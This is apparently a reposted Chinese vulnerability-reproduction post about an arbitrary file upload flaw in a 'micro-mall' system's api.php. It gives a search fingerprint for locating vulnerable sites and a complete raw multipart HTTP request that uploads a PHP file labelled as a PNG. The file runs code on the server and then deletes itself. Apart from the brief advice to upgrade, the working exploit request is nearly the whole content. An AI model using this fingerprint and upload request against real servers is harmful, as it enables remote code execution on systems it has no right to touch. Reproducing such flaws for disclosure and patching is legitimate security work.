body="/Mao_Public/js/jquery-2.1.1.min.js"
POST /api/api.php?mod=upload&type=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305
--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/png
<?php print(111*222);unlink(__FILE__);?>
--d0b7a0d40eed0e32904c8017b09eb305--
验证
知识星球:冷漠安全
升级至安全版本
原文始发于微信公众号(冷漠安全):「漏洞复现」微商城系统 api.php 文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论